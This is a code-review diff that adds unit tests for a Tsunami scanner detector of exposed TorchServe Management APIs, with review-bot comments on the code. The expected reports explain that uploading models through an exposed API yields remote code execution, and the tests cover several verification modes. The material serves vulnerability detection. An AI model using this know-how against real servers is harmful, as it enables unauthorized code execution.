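Review bot: `onTestExecution()` in TorchServeExploiterTestWithCallback is declared `public` with no `@Override`, whereas TorchServeManagementApiDetectorTest declares the same hook `@Override protected`; without the annotation a rename or signature change in the base class would silently turn this into an unused method and both tests would run without their mock responses. Put `@Override` on the line above and, to match the sibling test, `protected void onTestExecution() {`. The two test names also disagree on their prefix (`details_` and `detect_`) though both exercise `isServiceVulnerable`; a name such as `isServiceVulnerable_whenCallbackNotTriggered_returnsNull` follows the pattern used in TorchServeExploiterTest.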
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java
new file mode 100644
index 000000000..6736a75f9
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java
@@ -0,0 +1,416 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; + +import com.google.common.collect.ImmutableList; +import com.google.inject.AbstractModule; +import com.google.inject.Module; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.util.List; +import javax.inject.Inject; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** + * Unit tests for {@link TorchServeManagementApiDetector}. Tested in isolation from the {@link + * TorchServeExploiter}. 
+ */ +@RunWith(JUnit4.class) +public final class TorchServeManagementApiDetectorTest extends TorchServeManagementApiTestBase { + @Inject private MockTorchServeExploiter exploiter; + + private TorchServeManagementApiDetector detector; + + @Override + protected void onTestExecution() { + detector = new TorchServeManagementApiDetector(exploiter, fakeUtcClock); + } + + @Override + protected Module getBaseModule() { + Module basemoModule = super.getBaseModule(); + Module mockTorchServeExploiterModule = + new AbstractModule() { + @Override + protected void configure() { + bind(MockTorchServeExploiter.class); + } + }; + return Modules.override(basemoModule).with(mockTorchServeExploiterModule); + } + + @Test + public void detect_whenTorchServeIsNotVulnerable_doesNotReportVulnerability() throws IOException { + exploiter.returnNullDetails = true; + assertThat(getDetectionReports()).isEmpty(); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithBasicMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.BASIC; + exploiter.details.models = ImmutableList.of(); + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.LOW) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. 
The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the server.") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. 
Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Callback verification is not enabled in Tsunami" + + " configuration, so the exploit could not be" + + " confirmed and only the Management API detection" + + " is reported. It is recommended to enable" + + " callback verification for more conclusive" + + " vulnerability assessment.") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithSsrfMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. 
The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by receiving a callback from" + + " the target while adding a new model with the following details:" + + " - Name: test_model - URL: http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. 
Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "A callback was received from the target while adding a" + + " new model, confirming the exploit. Code" + + " execution was not verified directly. For a more" + + " direct confirmation of remote code execution," + + " consider using STATIC or LOCAL modes.") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithStaticMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.STATIC; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + exploiter.details.systemInfo = "{\"os\": \"Linux\"}"; + exploiter.details.messageLogged = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: "; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." 
+ + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by adding a new model to the" + + " target with the following details: - Name: test_model - URL:" + + " http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). 
\n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Code execution was verified by adding a new model to" + + " the target and performing following actions:\n" + + " - Calculating a hash of a random value and" + + " comparing it to the value returned by the" + + " target (Success)\n" + + "System info collected from the target:\n" + + "{\n" + + " \"os\": \"Linux\"\n" + + "}\n\n" + + "The following log entry was generated on the" + + " target:\n\n" + + "Tsunami TorchServe Plugin: Detected and" + + " executed. Refer to Tsunami Security Scanner" + + " repo for details. No malicious activity" + + " intended. Timestamp: ") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithLocalMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.LOCAL; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + exploiter.details.systemInfo = "{\"os\": \"Linux\"}"; + exploiter.details.messageLogged = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. 
Timestamp: "; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by adding a new model to the" + + " target with the following details: - Name: test_model - URL:" + + " http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. 
This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Code execution was verified by adding a new model to" + + " the target and performing following actions:\n" + + " - Calculating a hash of a random value and" + + " comparing it to the value returned by the" + + " target (Success)\n" + + "System info collected from the target:\n" + + "{\n" + + " \"os\": \"Linux\"\n" + + "}\n\n" + + "The following log entry was generated on the" + + " target:\n\n" + + "Tsunami TorchServe Plugin: Detected and" + + " executed. Refer to Tsunami Security Scanner" + + " repo for details. No malicious activity" + + " intended. Timestamp: ") + .build()) + .build()) + .build()) + .toString()); + } + + private List getDetectionReports() { + return detector + .detect( + TargetInfo.getDefaultInstance(), ImmutableList.of(NetworkService.getDefaultInstance())) + .getDetectionReportsList(); + } +} 
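Review bot: `getDetectionReports()` at the end of the hunk is declared with a raw `List`, so `get(0)` yields `Object` and the tests only compile because they immediately call `.toString()` on it; declare it `private List<DetectionReport> getDetectionReports() {` (the import is already present) and compare the protos directly with `assertThat(getDetectionReports().get(0)).isEqualTo(...)`, which reports field-level differences instead of a string diff. The four vulnerable-mode tests repeat the same ~40-line description and recommendation literal; a private helper that builds the shared `Vulnerability.Builder` and lets each test supply only the severity, the description suffix and the additional-detail text would make the differences between BASIC, SSRF, STATIC and LOCAL readable. The expected description in the SSRF, STATIC and LOCAL cases contains `" server.The exploit was confirmed"` with no space after the period, which presumably mirrors the detector's own text — if so the fix belongs in the detector, with this expectation updated alongside it. Minor: `basemoModule` in `getBaseModule()` is a typo for `baseModule`, and three test names say "TorchService" where the first test and the class say "TorchServe".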
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java new file mode 100644 index 000000000..4b8eca457 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java 
@@ -0,0 +1,101 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import com.google.inject.AbstractModule;
+import com.google.inject.Guice;
+import com.google.inject.Injector;
+import com.google.inject.Module;
+import com.google.inject.name.Named;
+import com.google.inject.name.Names;
+import com.google.tsunami.common.net.http.HttpClientModule;
+import com.google.tsunami.common.time.testing.FakeUtcClock;
+import com.google.tsunami.common.time.testing.FakeUtcClockModule;
+import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule;
+import java.io.IOException;
+import java.time.Instant;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.MockWebServer;
+import org.junit.After;
+import org.junit.Before;
+
+public abstract class TorchServeManagementApiTestBase {
+ @Inject
+ @Named("target")
+ protected MockWebServer mockTorchServe;
+
+ protected final FakeUtcClock fakeUtcClock =
+ FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z"));
+
+ // These should be defined in the subclass as needed
+ // @Inject
+ // protected TorchServeManagementApiDetector detector;
+
+ // @Inject
+ // protected TorchServeExploiter exploiter;
+
+ private static class CustomTestModule extends AbstractModule {
+ private FakeUtcClock fakeUtcClock;
+
+ CustomTestModule(FakeUtcClock fakeUtcClock) {
+ this.fakeUtcClock = fakeUtcClock;
+ }
+
+ @Override
+ protected void configure() {
+ // Guice modules provide by Tsunami
+ install(new HttpClientModule.Builder().build());
+ install(new FakeUtcClockModule(fakeUtcClock));
+
+ bind(MockWebServer.class)
+ .annotatedWith(Names.named("target"))
+ .toInstance(new MockWebServer());
+
+ FakePayloadGeneratorModule fakePayloadGeneratorModule =
+ FakePayloadGeneratorModule.builder().build();
+ install(fakePayloadGeneratorModule);
+
+ // Our detector and exploiter
+ bind(TorchServeRandomUtils.class).to(MockTorchServeRandomUtils.class);
+ bind(TorchServeManagementApiDetector.class);
+ bind(TorchServeExploiter.class);
+ bind(TorchServeManagementAPIExploiterWebServer.class)
+ .to(MockTorchServeManagementApiExploiterWebServer.class);
+ }
+ }
+
+ protected Module getBaseModule() {
+ return new CustomTestModule(fakeUtcClock);
+ }
+
+ // Override this in subclasses for custom setup
+ protected void onTestExecution() throws IOException {
+ // Do nothing
+ }
+
+ @Before
+ public void setUp() throws IOException {
+ Injector baseInjector = Guice.createInjector(getBaseModule());
+ baseInjector.injectMembers(this);
+ // this.mockTorchServe.start();
+ onTestExecution();
+ }
+
+ @After
+ public void tearDown() throws IOException {
+ // this.mockTorchServe.shutdown();
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java
new file mode 100644
index 000000000..769f50ecc
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java
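Review bot: The `@Named("target")` `MockWebServer` bound in `configure()` is never started or shut down by this base class — `this.mockTorchServe.start()` in `setUp()` and `this.mockTorchServe.shutdown()` in `tearDown()` are both commented out, leaving `tearDown()` empty. If a subclass starts that server (the earlier test in this patch enqueues responses on it, so it is presumably exercised), nothing here closes it, and a bound port with its acceptor thread can outlive the test; either restore the two calls so the base class owns the lifecycle, or delete the commented-out lines and state in a class Javadoc that subclasses must start and shut the server down themselves. The commented-out `@Inject` fields for `detector` and `exploiter` are dead code in the same way and belong in that Javadoc rather than in the class body. `CustomTestModule.fakeUtcClock` is assigned only in the constructor and should be `private final`.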
@@ -0,0 +1,72 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import com.google.inject.AbstractModule;
+import com.google.inject.Module;
+import com.google.inject.name.Named;
+import com.google.inject.name.Names;
+import com.google.inject.util.Modules;
+import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule;
+import java.io.IOException;
+import java.security.SecureRandom;
+import java.util.Arrays;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.MockWebServer;
+import org.junit.After;
+
+public abstract class TorchServeManagementApiTestBaseWithCallbackServer
+ extends TorchServeManagementApiTestBase {
+ @Inject
+ @Named("callback")
+ protected MockWebServer mockCallbackServer;
+
+ private final SecureRandom testSecureRandom =
+ new SecureRandom() {
+ @Override
+ public void nextBytes(byte[] bytes) {
+ Arrays.fill(bytes, (byte) 0xFF);
+ }
+ };
+
+ @Override
+ protected Module getBaseModule() {
+ Module baseModule = super.getBaseModule();
+ Module callbackModule =
+ new AbstractModule() {
+ @Override
+ protected void configure() {
+ MockWebServer mockCallbackServerInstance = new MockWebServer();
+ FakePayloadGeneratorModule fakePayloadGeneratorModule =
+ FakePayloadGeneratorModule.builder()
+ .setCallbackServer(mockCallbackServerInstance)
+ .setSecureRng(testSecureRandom)
+ .build();
+ install(fakePayloadGeneratorModule);
+ bind(MockWebServer.class)
+ .annotatedWith(Names.named("callback"))
+ .toInstance(mockCallbackServerInstance);
+ }
+ };
+ return Modules.override(baseModule).with(callbackModule);
+ }
+
+ @After
+ public void tearDown() throws IOException {
+ super.tearDown();
+ this.mockCallbackServer.shutdown();
+ }
+}
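Review bot: `testSecureRandom` carries no comment explaining why a `SecureRandom` whose `nextBytes` always fills the buffer with `0xFF` is handed to `setSecureRng`, so a reader can mistake it for a real RNG rather than a test fixture; add above the field `// Deterministic stand-in for the payload generator's RNG so the generated callback tokens are stable across runs; test-only.` and confirm the wording against FakePayloadGeneratorModule, which is outside this patch. The override covers only `nextBytes`, which is sufficient for `SecureRandom` because its other `next*` methods are derived from `next(int)` and that in turn draws from `nextBytes` — worth one sentence in the same comment, since a reader of this hunk alone cannot see that. The callback `MockWebServer` created in `configure()` is never visibly started but is shut down in `tearDown()`; presumably FakePayloadGeneratorModule starts it on demand, and a short comment on the `new MockWebServer()` line saying who owns start-up would save the next maintainer the same question.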